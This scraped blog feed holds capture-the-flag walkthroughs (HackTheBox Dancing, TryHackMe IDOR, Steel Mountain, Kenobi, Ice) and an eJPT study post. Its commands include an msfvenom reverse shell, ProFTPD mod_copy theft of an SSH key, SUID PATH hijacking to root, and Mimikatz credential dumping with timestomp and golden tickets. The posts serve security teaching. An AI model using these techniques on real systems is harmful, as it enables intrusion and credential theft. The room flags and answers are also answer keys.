preparation:\nINE\u0026rsquo;s Penetration Testing Student course: This course, available through INE\u0026rsquo;s platform, was my primary resource for exam preparation. It covers all the necessary topics and provides hands-on labs to practice your skills. INE\u0026rsquo;s Penetration Testing Student course\nPractice Labs: Hands-on experience is essential for this exam. In addition to INE\u0026rsquo;s labs, I found the following TryHackMe rooms particularly helpful:\nNmap Nmap Live Host Discovery Ice Blue Brooklyn Nine Nine Metasploit Introduction Basic Pentesting Blog Hydra Web Enumeration Additional online resources:\neLearnSecurity subreddit: This community is a valuable resource for discussions, tips, and shared experiences related to eLearnSecurity certifications, including the eJPT.\nSyselement\u0026rsquo;s Notes\nAbhi\u0026rsquo;s eJPT Roadmap\nPakCyberbot\u0026rsquo;s eJPTv2 Notes\nPractice tools: Familiarizing yourself with common penetration testing tools is important. Some key tools include:\nNmap for network scanning Metasploit for exploitation Burp Suite for web application testing Directory busting tools:\nNikto Dirbuster Gobuster Bruteforcing tool:\nHydra for bruteforcing login passwords Knowledge of the Penetration Testing Methodology: Understanding the structured approach to penetration testing is valuable. The key stages include:\nInformation Gathering Scanning and Enumeration Vulnerability Assessment Exploitation Post-Exploitation Being aware of which stage of the penetration testing process I was in helped me make decisions about next steps for my target. This awareness guided my choice of tools and techniques, ensuring a systematic approach to each scenario in the exam.\nDetailed Note-Taking: Taking detailed notes with steps and screenshots as I progressed through the INE course was extremely valuable. This practice helped in several ways:\nIt reinforced my learning by actively engaging with the material The notes served as a personal reference guide during exam preparation Screenshots helped me recall specific tool outputs and configurations Documenting steps allowed me to create my own procedures for common tasks I recommend creating a structured note-taking system that works for you, whether it\u0026rsquo;s a digital notebook, a personal wiki, or even handwritten notes. The act of documenting your learning journey not only aids in retention but also provides a valuable resource for quick review before and during the exam.\nConcluding Thoughts: The Impact of eJPT on My Cybersecurity Career #Earning the INE Security eJPT certification has been a rewarding experience that has enhanced my skills in ethical hacking. This journey provided valuable technical knowledge and improved my approach to systematic problem-solving in cybersecurity scenarios.\nI\u0026rsquo;d like to express my gratitude to Black Girls Hack for providing this valuable opportunity. Their organization offers mentorship, training, and support to both aspiring cybersecurity professionals and those already working in the field. Their support in making cybersecurity education more accessible plays an important role in diversifying and strengthening the field.\nWhether you\u0026rsquo;re looking to add new skills to your cybersecurity toolkit or focusing on ethical hacking, the eJPT certification offers a challenging yet achievable goal. Good luck on your own certification journey!\n","date":"July 15, 2024","permalink":"https://notesbynisha.com/posts/2024-07-15-ejpt-certification-journey/","section":"Writing","summary":"\u003cp\u003eEarning the INE Security Junior Penetration Tester (eJPT) certification has been a significant milestone in my cybersecurity journey. In this blog post, I\u0026rsquo;ll share my experience with the eJPT exam and the strategies that helped me succeed. Whether you\u0026rsquo;re considering this certification or preparing for the exam, I hope my insights will be useful for your own path in ethical hacking and penetration testing.\u003c/p\u003e","title":"My Journey to eJPT Certification: Insights and Tips for Success"},{"content":" Room Link: https://app.hackthebox.com/starting-point?tier=0\nTask 1 #What does the 3-letter acronym SMB stand for?\nServer Message Block\nTask 2 #What port does SMB use to operate at?\n445\nnmap -p- -vv -T4 10.129.237.107 Task 3 #What is the service name for port 445 that came up in our Nmap scan?\nmicrosoft-ds\nnmap -sC -sV -p135,445,1339,47001,49665-49669 10.129.237.107 Task 4 #What is the \u0026lsquo;flag\u0026rsquo; or \u0026lsquo;switch\u0026rsquo; that we can use with the smbclient utility to \u0026rsquo;list\u0026rsquo; the available shares on Dancing?\n-L\nsudo smbclient -L 10.129.237.107 -N Task 5 #How many shares are there on Dancing?\n4\nTask 6 #What is the name of the share we are able to access in the end with a blank password?\nWorkShares\nsudo smbclient //10.129.237.107/WorkShares -N Task 7 #What is the command we can use within the SMB shell to download the files we find?\nget\nSubmit root flag\n","date":"July 5, 2024","permalink":"https://notesbynisha.com/posts/2024-07-05-dancing-htb-walkthrough/","section":"Writing","summary":"\u003cp\u003e\u003cstrong\u003e Room Link: \u003c/strong\u003e  \u003ca href=\"https://app.hackthebox.com/starting-point?tier=0\" target=\"_blank\"\u003e\u003ca href=\"https://app.hackthebox.com/starting-point?tier=0\" target=\"_blank\" rel=\"noreferrer\"\u003ehttps://app.hackthebox.com/starting-point?tier=0\u003c/a\u003e\u003c/a\u003e\u003c/p\u003e\n\u003ch2 id=\"task-1\" class=\"relative group\"\u003eTask 1 \u003cspan class=\"absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100\"\u003e\u003ca class=\"group-hover:text-primary-300 dark:group-hover:text-neutral-700\" style=\"text-decoration-line: none !important;\" href=\"#task-1\" aria-label=\"Anchor\"\u003e#\u003c/a\u003e\u003c/span\u003e\u003c/h2\u003e\u003cp\u003eWhat does the 3-letter acronym SMB stand for?\u003c/p\u003e\n\u003cp\u003eServer Message Block\u003c/p\u003e\n\u003ch2 id=\"task-2\" class=\"relative group\"\u003eTask 2 \u003cspan class=\"absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100\"\u003e\u003ca class=\"group-hover:text-primary-300 dark:group-hover:text-neutral-700\" style=\"text-decoration-line: none !important;\" href=\"#task-2\" aria-label=\"Anchor\"\u003e#\u003c/a\u003e\u003c/span\u003e\u003c/h2\u003e\u003cp\u003eWhat port does SMB use to operate at?\u003c/p\u003e","title":"Dancing - HTB Walkthrough by Nisha"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/hack-the-box/","section":"Tags","summary":"","title":"Hack the Box"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/networking-services/","section":"Tags","summary":"","title":"Networking Services"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/reconnaissance/","section":"Tags","summary":"","title":"Reconnaissance"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/idor/","section":"Tags","summary":"","title":"IDOR"},{"content":" Walkthrough of the Insecure Direct Object Reference (IDOR) room on TryHackMe, part of the Jr. Web Penetration Tester learning path.\n🧭 Access the TryHackMe IDOR Room — Complete this room to practice real-world exploitation of Insecure Direct Object References in a safe lab environment.\nTask 1: What is an IDOR? #Q: What does IDOR stand for?\nA: Insecure Direct Object Reference\nIDOR occurs when an application exposes a reference to an internal object (e.g. file, user ID, invoice number) without checking that the user is authorized to access it.\nTask 2: An IDOR Example #In this task, we find an invoice URL in an email:\nhttps://onlinestore.thm/order/1234/invoice Modifying the 1234 ID to 1000 revealed another user’s invoice.\nFlag:\nTHM{IDOR-VULN-FOUND}\nTask 3: Finding IDORs in Encoded IDs #Q: What is a common type of encoding used by websites?\nA: base64\nCommon technique: # Look for =, ==, or suspicious long strings.\nDecode with:\necho MTIzNA== | base64 -d\nTask 4: Finding IDORs in Hashed IDs #Q: What is a common algorithm used for hashing IDs?\nA: md5\nExample: #GET /invoice?id=c4ca4238a0b923820dcc509a6f75849b echo -n \u0026quot;1\u0026quot; | md5sum Useful Tools: # Burp Suite Repeater CyberChef CrackStation Linux CLI: md5sum Task 5: Finding IDORs in Unpredictable IDs #Q: What is the minimum number of accounts you need to create to check for IDORs?\nA: 2\nCreate two accounts and test access to resources created by one from the other.\nTask 6: Where Are IDORs Located? #IDORs can be found in the following locations:\nCommon Locations Checklist # URL / Query Parameters – ?id=123 Form Data – user_id=123 HTTP Headers – X-User-ID: 123 Cookies – user_id=123 API Endpoints – /api/v1/customer?id=123 Task 7: A Practical IDOR Example #The following API call returns user info:\nGET http://10.10.99.57/api/v1/customer?id=1 Response: #{ \u0026quot;id\u0026quot;: 1, \u0026quot;username\u0026quot;: \u0026quot;adam84\u0026quot;, \u0026quot;email\u0026quot;: \u0026quot;adam-84@fakemail.thm\u0026quot; } Q: What is the username for user id 1?\nA: adam84\nTesting another ID:\nGET http://10.10.99.57/api/v1/customer?id=3 Response: #{ \u0026quot;id\u0026quot;: 3, \u0026quot;username\u0026quot;: \u0026quot;john911\u0026quot;, \u0026quot;email\u0026quot;: \u0026quot;j@fakemail.thm\u0026quot; } Q: What is the email address for user id 3?\nA: j@fakemail.thm\nAPI-Based IDOR Testing Checklist #Steps # Discover API endpoints using dev tools or proxy. Modify predictable IDs (1, 2, 3\u0026hellip;). Check if access control is enforced. Use Burp, Postman, or scripts. Document unauthorized access and impacted data. Visual Summary # Conclusion #This room reinforced several key lessons:\nUnderstanding and identifying IDOR vulnerabilities. Testing predictable and encoded identifiers. The importance of proper authorization checks on all sensitive endpoints. Thanks for reading!!\nNotesByNisha ","date":"June 29, 2024","permalink":"https://notesbynisha.com/posts/2024-06-29-idor-thm/","section":"Writing","summary":"\u003cblockquote\u003e\n\u003cp\u003eWalkthrough of the \u003cstrong\u003eInsecure Direct Object Reference (IDOR)\u003c/strong\u003e room on TryHackMe, part of the Jr. Web Penetration Tester learning path.\u003c/p\u003e\u003c/blockquote\u003e\n\u003cp\u003e🧭 \u003ca href=\"https://tryhackme.com/room/idor\" target=\"_blank\" rel=\"noreferrer\"\u003eAccess the TryHackMe IDOR Room\u003c/a\u003e — Complete this room to practice real-world exploitation of Insecure Direct Object References in a safe lab environment.\u003c/p\u003e","title":"TryHackMe IDOR Room Walkthrough"},{"content":"","date":null,"permalink":"https://notesbynisha.com/categories/web-exploitation/","section":"Categories","summary":"","title":"Web Exploitation"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/web-security/","section":"Tags","summary":"","title":"Web Security"},{"content":"Overview #This walkthrough demonstrates how I exploited the Steel Mountain room on TryHackMe. Each section includes detailed explanations of the enumeration, exploitation, and privilege escalation processes.\nTask 1 - Introduction #Deploy the machine.\nQ: Who is the employee of the month?\nA: Bill Harper\nTask 2 - Initial Access #Q: Scan the machine with nmap. What is the other port running a web server on? A: 8080 Q: Take a look at the other web server. What file server is running? A: Rejetto HTTP File Server\nQ: What is the CVE number to exploit this file server? A: 2014-6287\nQ: Use Metasploit to get an initial shell. What is the user flag? A: b04763b6fcf51fcd7c13abc7db4fd365\nTask 3 - Privilege Escalation #We have an initial shell on this machine as user Bill. Now, we will further enumerate the machine and escalate our privileges to root to obtain the final flag!\nWe can use the PowerUp PowerShell script to esclate our privileges.\nDownload the script using the following command:\nwget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1 We will use the upload command in Metasploit to upload the script.\nTo execute this using Meterpreter, we will type load powershell into meterpreter. Then we will enter powershell by entering powershell_shell:\nTake close attention to the CanRestart option that is set to true. What is the name of the service which shows up as an unquoted service path vulnerability?\nAdvancedSystemCareService9 Use msfvenom to generate a reverse shell as an Windows executable.\nmsfvenom -p windows/shell_reverse_tcp LHOST=CONNECTION_IP LPORT=4443 -e x86/shikata_ga_nai -f exe-service -o Advanced.exe Task 4 - Access and Escalation Without Metasploit #","date":"June 16, 2024","permalink":"https://notesbynisha.com/posts/2024-06-16-steel-mountain-thm-walkthrough/","section":"Writing","summary":"Hack into a Mr. Robot themed Windows machine. Use metasploit for initial access, utilise powershell for Windows privilege escalation enumeration and learn a new technique to get Administrator access.","title":"Steel Mountain - TryHackMe Walkthrough by Nisha"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/apache/","section":"Tags","summary":"","title":"Apache"},{"content":" The Kenobi room on TryHackMe is a beginner-friendly Linux box focused on enumeration, exploiting Samba, leveraging a vulnerable ProFTPD service, and escalating privileges using SUID binaries. It’s a great room for anyone learning about Linux enumeration and privilege escalation paths.\nThis walkthrough is structured around the key tasks provided in the room:\nTask 1: Deploy the vulnerable machine Task 2: Enumerate Samba for shares Task 3: Gain initial access with ProFtpd Task 4: Escalate privileges via Path Variable Manipulation Explore the official TryHackMe Kenobi room here: 🔗 View the Kenobi Room on TryHackMe\nTask 1: Deploy the Vulnerable Machine #Once the machine was deployed, I noted its IP address (e.g., 10.10.223.18) and ensured it was reachable. Then I launched an nmap scan to begin enumeration.\nScan the target machine:\nsudo nmap -sC -sV -T4 10.10.223.18 **Question:**Scan the machine with nmap, how many ports are open? Answer: There were 7 open ports:\n21 (FTP) 22 (SSH) 80 (HTTP) 111 (RPC) 139 (NetBIOS-SSN) 445 (Samba) 2049 (NFS) Figure: Visiting the target\u0026rsquo;s IP in a browser reveals a Star Wars-themed splash page hosted on port 80.\nNavigating to the machine’s IP address in a browser confirmed that a web server was active on port 80. Rather than the default Apache page, we were greeted with a stylized Star Wars-themed image, adding some fun flair while confirming the HTTP service is live. This page didn’t expose sensitive info, but confirmed Apache or similar is configured to serve custom content.\nTask 2: Enumerate Samba for Shares #To enumerate SMB shares, I ran the following nmap script:\nnmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.223.18 Question: Using the nmap command above, how many shares have been found? Answer: 3 shares were found:\nIPC$ anonymous print$ We then accessed the anonymous share using smbclient:\nsmbclient //10.10.223.18/anonymous Once connected, I listed the contents of the share:\ndir Question: Once you\u0026rsquo;re connected, list the files on the share. What is the file can you see?\nAnswer: The file present on the share was log.txt.\nInspecting log.txt #cat log.txt This file revealed two key findings:\nAn RSA key was generated for user kenobi' at /home/kenobi/.ssh/id_rsa` A ProFTPD configuration was mentioned—suggesting anonymous FTP is active and potentially exploitable via mod_copy. Question: What port is FTP running on?\nAnswer: FTP is running on port 21.\nEnumerating Network File System (NFS) #We knew port 111 was open, which can indicate NFS. I ran the following:\nnmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.223.18 Question: What mount can we see?\nAnswer: /var is mountable via NFS.\nTask 3: Gain Initial Access with ProFtpd #Lets get the version of ProFtpd. Use netcat to connect to the machine on the FTP port.\nQuestion: What is the version?\nFrom the initial nmap scan:\nAnswer: Version 1.3.5\nWe can use searchsploit to find exploits for a particular software version.\nSearchsploit is basically just a command line search tool for exploit-db.com.\nQuestion: How many exploits are there for the ProFTPd running?\nI used searchsploit to find matching exploits:\nsearchsploit proftpd 1.3.5 Answer: 4 exploits available for ProFTPD 1.3.5, including mod_copy vulnerabilities.\nYou should have found an exploit from ProFtpd\u0026rsquo;s mod_copy module.\nThe mod_copy module implements SITE CPFR and SITE CPTO commands, which can be used to copy files/directories from one place to another on the server. Any unauthenticated client can leverage these commands to copy files from any part of the filesystem to a chosen destination.\nWe know that the FTP service is running as the Kenobi user (from the file on the share) and an ssh key is generated for that user.\nExploiting ProFTPD mod_copy to Retrieve the Private Key #We\u0026rsquo;re now going to copy Kenobi\u0026rsquo;s private key using SITE CPFR and SITE CPTO commands.\nI connected to FTP using netcat and issued:\nnc 10.10.223.18 21 SITE CPFR /home/kenobi/.ssh/id_rsa SITE CPTO /var/tmp/id_rsa We knew that the /var directory was a mount we could see (task 2, question 4). So we\u0026rsquo;ve now moved Kenobi\u0026rsquo;s private key to the /var/tmp directory.\nMounting /var and Retrieving the Private Key #Lets mount the /var/tmp directory to our machine\nsudo mkdir /mnt/kenobiNFS sudo mount 10.10.223.18:/var /mnt/kenobiNFS ls -la /mnt/kenobiNFS/tmp We now have a network mount on our deployed machine! We can go to /var/tmp and get the private key then login to Kenobi\u0026rsquo;s account.\nsudo cp /mnt/kenobiNFS/tmp/id_rsa . sudo chmod 600 id_rsa SSH Login as Kenobi #ssh -i id_rsa kenobi@10.10.223.18 Once logged in:\ncat /home/kenobi/user.txt This confirmed access as kenobi. Now we move on to privilege escalation.\nQuestion: What is Kenobi\u0026rsquo;s user flag (/home/kenobi/user.txt)?\nAnswer: d0b0f3f53b6caa532a83915e19224899\nTask 4: Privilege Escalation with SUID Binary #To begin privilege escalation, I searched for binaries with the SUID (Set User ID) bit set. The SUID permission causes executables to run with the permissions of the file owner, not the user who ran them. That’s a big deal when the file is owned by root because it means a low-privilege user might execute code with root privileges.\nI used the following command to list all SUID binaries on the system:\nfind / -perm -u=s -type f 2\u0026gt;/dev/null / tells it to start at the root of the file system -perm -u=s looks for files with the user SUID bit set -type f filters to regular files (not directories, sockets, etc.) 2\u0026gt;/dev/null hides “Permission Denied” errors to keep the output clean This command returned a list of binaries, many of which are expected system utilities like /usr/bin/passwd, /bin/su, and /usr/bin/sudo.\nBut one binary stood out:\n/usr/bin/menu This is not a standard utility on Linux systems, and it’s unusual for a custom binary to have SUID permissions. This made it a prime candidate for further analysis.\nQ: What file looks particularly out of the ordinary?\nA: /usr/bin/menu\nQ: Run the binary, how many options appear?\nA: 3\nRunning this binary:\n/usr/bin/menu presents a list of system-related options.\nInvestigating Vulnerable Behavior #To investigate the binary, I ran the strings command to extract readable strings:\nstrings /usr/bin/menu This output revealed several important clues. Near the bottom of the output were three recognizable commands:\ncurl -I localhost uname -r ifconfig These are basic Linux networking and system commands that a script might use to check HTTP connectivity, system version, or network configuration. However, they were not referenced with their full paths (such as /usr/bin/curl). Instead, the binary simply calls them by name.\nThis is dangerous behavior in a SUID binary. When a program runs with elevated privileges and executes a command without specifying the full path, it relies on the PATH environment variable to locate that command. If a malicious user places a fake script named curl in a directory like /tmp, and then manipulates the PATH variable to prioritize that directory, the binary will execute the fake script instead.\nBecause menu is owned by root and has the SUID bit set, it runs as root, which means the attacker’s fake script also runs as root.\nWe demonstrated this by copying /bin/sh into a file named curl, making it executable, and updating our PATH variable:\ncd /tmp echo /bin/sh \u0026gt; curl chmod 777 curl export PATH=/tmp:$PATH /usr/bin/menu When menu executed curl, it actually invoked our shell as root.\nid uid=0(root) gid=1000(kenobi) groups=1000(kenobi),... This sets up a classic and powerful privilege escalation vector known as PATH hijacking.\nCapturing the Root Flag #With root access achieved, I navigated to the root user\u0026rsquo;s home directory and retrieved the final flag:\ncat /root/root.txt **Q: What is the root flag (/root/root.txt)? Root Flag: 177b3cd8562289f37382721c28381f02\nLessons Learned # Enumeration is everything — it led us to discover open ports, accessible shares, and service versions.\nThe mod_copy vulnerability in ProFTPD enabled file extraction and SSH access.\nMisconfigured SUID binaries can be devastating when they rely on PATH without hardcoded command paths.\nPATH hijacking remains a critical privilege escalation technique on Linux systems.\nThis was a fantastic room to practice chaining enumeration and exploitation steps together for a full system compromise.\n","date":"June 14, 2024","permalink":"https://notesbynisha.com/posts/2024-06-14-hacking-kenobi-tryhackme/","section":"Writing","summary":"A complete walkthrough of the Kenobi TryHackMe room, covering enumeration, exploiting ProFTPD, and privilege escalation using SUID PATH hijacking.","title":"Hacking Kenobi: From Anonymous Access to Root like a Rebel"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/kenobi/","section":"Tags","summary":"","title":"Kenobi"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/linux-privesc/","section":"Tags","summary":"","title":"Linux PrivEsc"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/netcat/","section":"Tags","summary":"","title":"Netcat"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/nmap/","section":"Tags","summary":"","title":"Nmap"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/samba/","section":"Tags","summary":"","title":"Samba"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/walkthrough/","section":"Tags","summary":"","title":"Walkthrough"},{"content":"","date":null,"permalink":"https://notesbynisha.com/categories/ctf/","section":"Categories","summary":"","title":"CTF"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/machines/","section":"Tags","summary":"","title":"Machines"},{"content":"Deploy \u0026 hack into a Windows machine, exploiting a very poorly secured media server. Room Link: https://tryhackme.com/r/room/ice\nTask 1 - Connect #Get connected to the TryHackMe network using OpenVPN. Make sure to first download your configuration file from your access page. Task 2 - Recon #Click on Start Machine to deploy the machine!\nTime to Scan and Enumerate our target!\nAn NMAP scan reveals the following ports were discovered to be open:\nQ: One of the more interesting ports that is open is Microsoft Remote Desktop (MSRDP). What port is this open on? Answer: 3389\nQ: What service did nmap identify as running on port 8000? (First word of this service) Answer: Icecast Q: What does Nmap identify as the hostname of the machine? (All caps for the answer)\nAnswer: DARK-PC Task 3 - Gain Access #In this task we must find a way to exploit any vulnerable services on the target to gain a foothold. The cvedetails website reveals that the impact score and the CVE number for this vulnerability as displayed in the image below.\nQ: What is the Impact Score for this vulnerability? Use https://www.cvedetails.com for this question and the next. Answer: 6.4 Q: What is the CVE number for this vulnerability? Answer: CVE-2004-1561 It is time to use the information that we have collected to locate an exploit for our target. We will use automation for this exploitation exercise with Metasploit being our tool of choice.\nType \u0026ldquo;msfconsole\u0026rdquo; to launch the Metasploit Framework. msfconsole Q: After Metasploit has started, let\u0026rsquo;s search for our target exploit using the command \u0026lsquo;search icecast\u0026rsquo;. What is the full path (starting with exploit) for the exploitation module? If you are not familiar with metasploit, take a look at the Metasploit module. Answer: exploit/windows/http/icecast_header\nuse exploit/windows/http/icecast_header set RHOSTS 10.2.119.123 set LHOST tun0 # set LHOST attackerIPaddress or interface\nexploit Task 4 - Escalate # Our goal for this task is to complete any local enumeration to discover paths to escalte our privileges in our quest to gain Admin powers. Q: Woohoo! We\u0026rsquo;ve gained a foothold into our victim machine! What\u0026rsquo;s the name of the shell we have now? Answer: meterpreter Q: What user was running that Icecast process? The commands used in this question and the next few are taken directly from the \u0026lsquo;Metasploit\u0026rsquo; module. Answer: Dark Q: What build of Windows is the system? Answer: 7601 sysinfo Q:Now that we know some of the finer details of the system we are working with, let\u0026rsquo;s start escalating our privileges. First, what is the architecture of the process we\u0026rsquo;re running? Answer: x64 Now that we know the architecture of the process, let\u0026rsquo;s perform some further recon. While this doesn\u0026rsquo;t work the best on x64 machines, let\u0026rsquo;s now run the following command run post/multi/recon/local_exploit_suggester. This can appear to hang as it tests exploits and might take several minutes to complete ``bash run post/multi/recon/local_exploit_suggester\nQ: Running the local exploit suggester will return quite a few results for potential escalation exploits. What is the full path (starting with exploit/) for the first returned exploit? \u0026lt;br\u0026gt; Answer: exploit/windows/local/bypassuac_eventvwr \u0026lt;img src=\u0026#34;/assets/images/thm/thm-ice-14.png\u0026#34;\u0026gt; Q: Now that we have an exploit in mind for elevating our privileges, let\u0026#39;s background our current session using the command `background` or `CTRL + z`. Take note of what session number we have, this will likely be 1 in this case. We can list all of our active sessions using the command `sessions` when outside of the meterpreter shell. A: No Answer Needed \u0026lt;img src=\u0026#34;/assets/images/thm/thm-ice-15.png\u0026#34;\u0026gt; Q: Go ahead and select our previously found local exploit for use using the command `use FULL_PATH_FOR_EXPLOIT` \u0026lt;br\u0026gt; A: No answer needed Q: Local exploits require a session to be selected (something we can verify with the command `show options`), set this now using the command `set session SESSION_NUMBER` ```bash set session 1 A: No answer needed\nQ: Now that we\u0026rsquo;ve set our session number, further options will be revealed in the options menu. We\u0026rsquo;ll have to set one more as our listener IP isn\u0026rsquo;t correct. What is the name of this option?\nA: LHOST\nQ: Set this option now. You might have to check your IP on the TryHackMe network using the command ip addr\nA: No answer needed\nQ: After we\u0026rsquo;ve set this last option, we can now run our privilege escalation exploit. Run this now using the command run. Note, this might take a few attempts and you may need to relaunch the box and exploit the service in the case that this fails.\nA: No answer needed\nQ: Following completion of the privilege escalation a new session will be opened. Interact with it now using the command sessions SESSION_NUMBER\nA: No answer needed\nQ: We can now verify that we have expanded permissions using the command getprivs. What permission listed allows us to take ownership of files?\nA: SeTakeOwnershipPrivilege\ngetprivs Task 5 - Looting # Q: Prior to further action, we need to move to a process that actually has the permissions that we need to interact with the lsass service, the service responsible for authentication within Windows. First, let\u0026rsquo;s list the processes using the command ps. Note, we can see processes being run by NT AUTHORITY\\SYSTEM as we have escalated permissions (even though our process doesn\u0026rsquo;t).\nA: No answer needed\nQ: In order to interact with lsass we need to be \u0026rsquo;living in\u0026rsquo; a process that is the same architecture as the lsass service (x64 in the case of this machine) and a process that has the same permissions as lsass. The printer spool service happens to meet our needs perfectly for this and it\u0026rsquo;ll restart if we crash it! What\u0026rsquo;s the name of the printer service?\nMentioned within this question is the term \u0026rsquo;living in\u0026rsquo; a process. Often when we take over a running program we ultimately load another shared library into the program (a dll) which includes our malicious code. From this, we can spawn a new thread that hosts our shell. A: spoolsv.exe\nQ: Migrate to this process now with the command migrate -N PROCESS_NAME\nA: No answer needed\nmigrate -N spoolsv.exe Q: Let\u0026rsquo;s check what user we are now with the command getuid. What user is listed?\ngetuid A: NT AUTHORITY\\SYSTEM\n\u0026lt;img src=\u0026quot;/assets/images/thm/thm-ice-25.png\nQ: Now that we\u0026rsquo;ve made our way to full administrator permissions we\u0026rsquo;ll set our sights on looting. Mimikatz is a rather infamous password dumping tool that is incredibly useful. Load it now using the command load kiwi (Kiwi is the updated version of Mimikatz)\nA: No answer needed\nload kiwi \u0026lt;img src=\u0026quot;/assets/images/thm/thm-ice-26.png\nQ: Loading kiwi into our meterpreter session will expand our help menu, take a look at the newly added section of the help menu now via the command help.\nA: No answer needed\nQ: Which command allows up to retrieve all credentials?\nA: creds_all\n\u0026lt;img src=\u0026quot;/assets/images/thm/thm-ice-27.png\nQ: Run this command now. What is Dark\u0026rsquo;s password? Mimikatz allows us to steal this password out of memory even without the user \u0026lsquo;Dark\u0026rsquo; logged in as there is a scheduled task that runs the Icecast as the user \u0026lsquo;Dark\u0026rsquo;. It also helps that Windows Defender isn\u0026rsquo;t running on the box ;) (Take a look again at the ps list, this box isn\u0026rsquo;t in the best shape with both the firewall and defender disabled)\nA: Password01\n\u0026lt;img src=\u0026quot;/assets/images/thm/thm-ice-28.png\nTask 6 - Post-Exploitation #Q: Before we start our post-exploitation, let\u0026rsquo;s revisit the help menu one last time in the meterpreter shell. We\u0026rsquo;ll answer the following questions using that menu.\nA: No answer needed\nQ: What command allows us to dump all of the password hashes stored on the system? We won\u0026rsquo;t crack the Administrative password in this case as it\u0026rsquo;s pretty strong (this is intentional to avoid password spraying attempts)\nA: hashdump\nQ: While more useful when interacting with a machine being used, what command allows us to watch the remote user\u0026rsquo;s desktop in real time?\nA: screenshare\nQ: How about if we wanted to record from a microphone attached to the system? A: record_mic\nQ: To complicate forensics efforts we can modify timestamps of files on the system. What command allows us to do this? Don\u0026rsquo;t ever do this on a pentest unless you\u0026rsquo;re explicitly allowed to do so! This is not beneficial to the defending team as they try to breakdown the events of the pentest after the fact.\ntimestomp\nMimikatz allows us to create what\u0026rsquo;s called a golden ticket, allowing us to authenticate anywhere with ease. What command allows us to do this?\nGolden ticket attacks are a function within Mimikatz which abuses a component to Kerberos (the authentication system in Windows domains), the ticket-granting ticket. In short, golden ticket attacks allow us to maintain persistence and authenticate as any user on the domain.\ngolden_ticket_create\nOne last thing to note. As we have the password for the user \u0026lsquo;Dark\u0026rsquo; we can now authenticate to the machine and access it via remote desktop (MSRDP). As this is a workstation, we\u0026rsquo;d likely kick whatever user is signed onto it off if we connect to it, however, it\u0026rsquo;s always interesting to remote into machines and view them as their users do. If this hasn\u0026rsquo;t already been enabled, we can enable it via the following Metasploit module: run post/windows/manage/enable_rdp\nTask 7 - Extra Credit #","date":"June 4, 2024","permalink":"https://notesbynisha.com/posts/2024-06-04-ice-tryhackme-walkthrough/","section":"Writing","summary":"\u003ch5\u003eDeploy \u0026 hack into a Windows machine, exploiting a very poorly secured media server. \u003c/h5\u003e\n\u003cimg src=\"/assets/images/thm/thm-ice-1.png\"\u003e\n\u003cp\u003e\u003cstrong\u003e Room Link: \u003c/strong\u003e \u003ca href=\"https://tryhackme.com/r/room/ice\"\u003e \u003ca href=\"https://tryhackme.com/r/room/ice\" target=\"_blank\" rel=\"noreferrer\"\u003ehttps://tryhackme.com/r/room/ice\u003c/a\u003e\u003c/a\u003e\u003c/p\u003e\n\u003ch2 id=\"task-1---connect\" class=\"relative group\"\u003eTask 1 - Connect \u003cspan class=\"absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100\"\u003e\u003ca class=\"group-hover:text-primary-300 dark:group-hover:text-neutral-700\" style=\"text-decoration-line: none !important;\" href=\"#task-1---connect\" aria-label=\"Anchor\"\u003e#\u003c/a\u003e\u003c/span\u003e\u003c/h2\u003e\u003cp\u003eGet connected to the TryHackMe network using OpenVPN. Make sure to first download your configuration file from \u003ca href=\"http://tryhackme.com/access \"\u003eyour access page. \u003c/a\u003e\u003c/p\u003e","title":"TryHackMe Ice - Walkthrough by Nisha"},{"content":"Step 1: Update Your System\nInstall Remmina sudo apt install remmina\nLaunch Remmina Step 4: Configure a Remote Connection\n","date":"April 14, 2024","permalink":"https://notesbynisha.com/posts/2024-04-14-how-to-install-remmina-on-kali-linux/","section":"Writing","summary":"\u003cp\u003eStep 1:  Update Your System\u003c/p\u003e\n\u003cimg src=\"/assets/images/remmina1.PNG\"\u003e\n\u003col start=\"2\"\u003e\n\u003cli\u003eInstall Remmina\u003c/li\u003e\n\u003c/ol\u003e\n\u003cp\u003esudo apt install remmina\u003c/p\u003e\n\u003cimg src=\"/assets/images/remmina2.PNG\"\u003e\n\u003col start=\"3\"\u003e\n\u003cli\u003eLaunch Remmina\u003c/li\u003e\n\u003c/ol\u003e\n\u003cimg src=\"/assets/images/remmina3.PNG\"\u003e\n\u003cimg src=\"/assets/images/remmina4.PNG\"\u003e\n\u003cp\u003eStep 4:  Configure a Remote Connection\u003c/p\u003e","title":"How to Install Remmina on Kali Linux"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/cron-job-exploitation/","section":"Tags","summary":"","title":"Cron Job Exploitation"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/ctf-walkthrough/","section":"Tags","summary":"","title":"CTF Walkthrough"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/file-upload-vulnerability/","section":"Tags","summary":"","title":"File Upload Vulnerability"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/ftp-enumeration/","section":"Tags","summary":"","title":"FTP Enumeration"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/hash-cracking/","section":"Tags","summary":"","title":"Hash Cracking"},{"content":"Rooting the Academy Box: A Practical Ethical Hacking Walkthrough #In this blog post, I\u0026rsquo;ll walk you through the process of rooting the Academy box from the TCM Academy\u0026rsquo;s Practical Ethical Hacker course. The box was designed to test your skills in directory busting, FTP exploration, PHP webshell uploads, and Linux privilege escalation.\nKey Learning 